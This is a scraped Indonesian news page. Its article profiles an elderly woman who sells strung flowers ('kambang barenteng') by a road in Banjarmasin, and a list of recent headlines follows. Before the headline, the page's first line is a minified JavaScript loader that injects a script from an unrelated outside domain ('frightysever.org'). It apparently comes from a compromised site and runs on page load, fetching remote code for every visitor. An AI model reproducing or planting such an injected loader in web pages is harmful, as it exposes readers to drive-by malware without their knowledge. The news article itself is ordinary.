(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Si Renta Penjual “Kambang Barenteng” yang Tak Ingin Repotkan Cucunya


KANALKALIMANTAN.COM, BANJARMASIN – Di bawah teduhnya payung yang dipegang dengan kedua tangan perempuan tua ini, menunggu dan berharap orang-orang yang melintas di jalan persis di depannya singgah. Acil Salbiah, begitu biasa perempuan ini disapa, seorang penjual “Kambang Barenteng” atau bunga untai di pinggir Jalan Perintis Kemerdekaan, Banjarmasin.

Tak ada bangunan kios khusus, apalagi toko dimana Acil Salbiah berjualan. Hanya satu keranjang plastik posisi dibalik serta dua buah ceper kecil yang diisi “Kambang Barenteng”, dan satu ember kecil berisi air, serta payung, itulah peralatan modal Acil Salbiah berjualan. Posisi Acil Salbiah tepat di pojok ujung batas sebuah halaman parkir ruko, disitulah ia tempati. Di atas semen, menghadap ke jalan aspal, tak jauh dari selokan, di antara badan jalan dengan halaman parkir ruko.

Ditemui Kanalkalimantan.com, Salbiah mengaku sudah berumur 80 tahun, di umur yang sudah sangat tua itu, ia masih tetap berdagang bunga untai -Bahasa Banjar Kambang Barenteng- , untuk bisa memenuhi kebutuhan hidupnya sehari-hari.

Acil Salbiah mengatakan, ia berdagang untuk bisa bertahan hidup bagi dirinya sendiri, dan tidak ingin merepotkan cucunya.

 

“Ya kalau tidak jualan, bagaimana saya bisa makan sehari-hari. Dari pada saya minta sama orang lain, malah merepotkan orang saja jadinya,” ujar Acil Salbiah, saat dijumpai, Sabtu (6/3/2021) pagi.

Mengingat umur yang sudah tua, Acil Salbiah mengaku hanya berjualan tiga hari dalam sepekan, yaitu hari Kamis, Jumat dan Sabtu, di pinggir ruas Jalan Perintis Kemerdekaan, Banjarmasin. Sementara hari lainnya ia pergunakan untuk beristirahat, dikarenakan kondisi fisik yang sudah tidak memungkinkan untuk bisa beraktifitas banyak karena sudah cepat lelah.

Perempuan tua mandiri hingga usia renta ini mengaku punya anak lima, tapi semua anaknya sudah pergi meninggalkannya. Acil Salbiah berjualan bunga alias kambang barenteng kurang lebih sekitar 30 tahun. Sebelumnya, ia juga pernah menjadi pedagang sayur di pasar terapung.

Walaupun ia tidak ingin mengungkapkan berapa penghasilan dari berjualan Kambang Barenteng tersebut. Tetapi dengan penghasilan penjualan bunga seharga 10 ribu per buah itulah yang digunakan untuk menopang kehidupannya.

“Ya walaupun tidak banyak, tapi cukuplah untuk membeli 2-3 liter beras buat makan,” ungkap Acil Salbiah.

Acil Salbiah mengaku hanya tinggal sendiri di rumah, di Pangambangan, Kecamatan Banjarmasin Timur, suaminya sudah meninggal dunia 20 tahun silam, lima anaknya pun sudah tiada, hanya ditemani cucunya.

Acil Salbiah tidak ingin merepotkan cucunya yang hanya berprofesi sebagai tukang ojek.

“Ya walaupun sudah tua begini, saya tidak mau merepotkan mereka. Karena cucu saya juga harus menghidupi istri dan anak-anaknya dengan penghasilan yang tidak seberapa itu,” tutur Acil Salbiah sembari menyirami Kambang Barenteng agar tetap segar.

“Ya yang namanya hidup jalani saja dengan apa adanya, yang penting bisa makan saja sudah cukup. Apa lagi seperti saya di umur yang sudah tua ini, tidak ada banyak kebutuhan juga, dan juga dari pada saya tidak ada kerjaan di rumah lebih baik saya jualan, selama saya masih mampu,” pungkas Acil Salbiah.
(kanalkalimantan.com/tius)

Reporter : tius
Editor : bie


Al Ghifari

Recent Posts

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

22 menit ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

3 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

4 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

5 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

7 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

7 jam ago

This website uses cookies.